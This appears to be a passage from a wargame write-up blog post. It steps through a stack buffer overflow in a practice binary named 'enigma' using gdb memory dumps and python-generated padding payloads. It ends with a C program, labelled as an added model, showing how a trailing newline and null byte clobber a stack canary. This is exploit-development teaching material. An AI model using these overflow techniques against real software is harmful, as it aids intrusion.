When the input is stored at its destination, a null byte seems to get appended after it.


So when the canary sits immediately after ret, the bytes that trail the payload spill into the canary and clobber it, so watch out for that.


(gdb) x/100x $esp
0xbffca220: 0x00000000 0x530e0443 0x00000000 0x530e14b1
0xbffca230: 0x00000000 0x61616161 0x61616161 0x61616161
0xbffca240: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca250: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca260: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca270: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca280: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca290: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca2a0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca2b0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca2c0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca2d0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca2e0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca2f0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca300: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca310: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca320: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca330: 0x61616161 0x62626262 0x63636363 0x0804000a
0xbffca340: 0x00031337 0xbffca368 0x008cb740 0x00000000
0xbffca350: 0x007a3828 0x00040000 0x00000000 0x007a3300
0xbffca360: 0x00000000 0x0079eb64 0x61616161 0x61616161
0xbffca370: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca380: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca390: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca3a0: 0x61616161 0x61616161 0x61616161 0x61616161

(gdb) she (python -c 'print "a"*260 + "bbbb" + "cccc"') > res
(gdb) r < res
The program being debugged has been started already.
Start it from the beginning? (y or n) y
warning: cannot close "shared object read from target memory": File in wrong format
Starting program: /home/cruel/tmp/enigma < res
Reading symbols from shared object read from target memory...(no debugging symbols found)...done.
Loaded system supplied DSO at 0x576000
(no debugging symbols found)
(no debugging symbols found)
enigma : The brothers will be glad to have you!
you : 
Breakpoint 3, 0x08048526 in vuln ()

(gdb) x/100x $esp
0xbf9d9180: 0x00000000 0x530e14b4 0x00000000 0x530e14c1
0xbf9d9190: 0x00000000 0x61616161 0x61616161 0x61616161
0xbf9d91a0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d91b0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d91c0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d91d0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d91e0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d91f0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9200: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9210: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9220: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9230: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9240: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9250: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9260: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9270: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9280: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9290: 0x61616161 0x61616161 0x62626262 0x63636363
0xbf9d92a0: 0x0003000a 0xbf9d92c8 0x008cb740 0x00000000
0xbf9d92b0: 0x007a3828 0x00040000 0x00000000 0x007a3300
0xbf9d92c0: 0x00000000 0x0079eb64 0x61616161 0x61616161
0xbf9d92d0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d92e0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d92f0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9300: 0x61616161 0x61616161 0x61616161 0x61616161



So the input is stored as data + \x0a\x00: the newline is kept and a null terminator is written after it. That is how an fgets()-style read behaves (gets() would drop the newline and store only the null). The two dumps show it directly: with the shorter payload the word after cccc reads 0x0804000a, its two low bytes replaced by 0a 00 while 0x00031337 is untouched; with four more a's, cccc lands on that word and the canary word itself becomes 0x0003000a. So budget for those two extra bytes whenever something that must stay intact sits right after the payload.
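To make the two dumps reproducible without a debugger, here is an added example (not code from the original post or from the enigma binary) that models the frame as a C struct: a 256-byte buffer, two scratch words, a word standing in for the 0x0804xxxx return-address slot, and the 0x00031337 canary right after it. The struct layout, the 0x080485ab placeholder for the return-address word, and the use of fgets() as the reading routine are assumptions; the page shows neither the real frame nor the input function. It feeds the same python payloads (256 and 260 a's, then bbbb, cccc and print's newline) through fgets() and returns what lands in the two words, so the trailing \x0a\x00 from the dumps shows up as the 0x0804000a and 0x0003000a values.

```c
#include <inttypes.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of the frame seen in the dumps (an assumption, not the
 * real layout of the enigma binary): a 256-byte buffer, two scratch words,
 * a word standing in for the 0x0804xxxx return-address slot, and the
 * 0x00031337 canary right after it. tail[] only exists so the whole frame
 * can be handed to fgets() as one oversized "buffer". */
struct frame {
    char     buf[256];
    uint32_t slot_a;
    uint32_t slot_b;
    uint32_t ret;     /* only the 0x0804 high bytes are known; low bytes are a placeholder */
    uint32_t canary;  /* 0x00031337 in the dumps */
    char     tail[8];
};

/* What the two interesting words hold after one delivery, plus how many
 * bytes fgets() stored before its terminating null. */
struct probe {
    int      ok;
    uint32_t ret;
    uint32_t canary;
    size_t   len;
};

/* Sanity check that the model has the offsets the explanation relies on. */
int layout_ok(void)
{
    return offsetof(struct frame, slot_a) == 256
        && offsetof(struct frame, slot_b) == 260
        && offsetof(struct frame, ret)    == 264
        && offsetof(struct frame, canary) == 268;
}

/* The bytes python printed for the post: n_a 'a's + "bbbb" + "cccc", plus
 * the newline that print adds. Returns the byte count, 0 if it does not fit. */
static size_t build_payload(char *out, size_t cap, size_t n_a)
{
    size_t len = n_a + 8 + 1;
    if (len >= cap)
        return 0;
    memset(out, 'a', n_a);
    memcpy(out + n_a, "bbbbcccc", 8);
    out[n_a + 8] = '\n';
    return len;
}

/* Write the payload to a temporary file and read it back with fgets() into
 * the frame, which is what `r < res` does for the real program. */
struct probe deliver(size_t n_a)
{
    struct probe p = { 0, 0, 0, 0 };
    char payload[512];
    size_t len = build_payload(payload, sizeof payload, n_a);
    if (len == 0)
        return p;

    struct frame f;
    memset(&f, 0, sizeof f);
    f.ret    = 0x080485abu;   /* placeholder value, see the struct comment */
    f.canary = 0x00031337u;

    FILE *in = tmpfile();
    if (in == NULL)
        return p;
    if (fwrite(payload, 1, len, in) != len) {
        fclose(in);
        return p;
    }
    rewind(in);

    /* The overflow the post is exploiting: the read is bounded by the frame,
     * not by buf[]. fgets() keeps the '\n' and then writes a '\0', so two
     * bytes land past the last byte the payload deliberately placed. */
    if (fgets((char *)&f, (int)sizeof f, in) == NULL) {
        fclose(in);
        return p;
    }
    fclose(in);

    p.ok     = 1;
    p.ret    = f.ret;
    p.canary = f.canary;
    p.len    = strlen((const char *)&f);
    return p;
}

int main(void)
{
    struct probe a = deliver(256);   /* first dump: ret 0x0804000a, canary intact */
    struct probe b = deliver(260);   /* second dump: canary becomes 0x0003000a */
    printf("256 a's: ret=0x%08" PRIx32 " canary=0x%08" PRIx32 " stored=%zu\n", a.ret, a.canary, a.len);
    printf("260 a's: ret=0x%08" PRIx32 " canary=0x%08" PRIx32 " stored=%zu\n", b.ret, b.canary, b.len);
    return 0;
}
```

With 256 a's the ret word comes back as 0x0804000a and the canary stays 0x00031337; with 260 a's, cccc lands on ret and the canary reads 0x0003000a, the same two values the dumps show. The stored length (265 and 269) is the payload plus the kept newline, which is the byte count to plan around.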

Posted by windowhan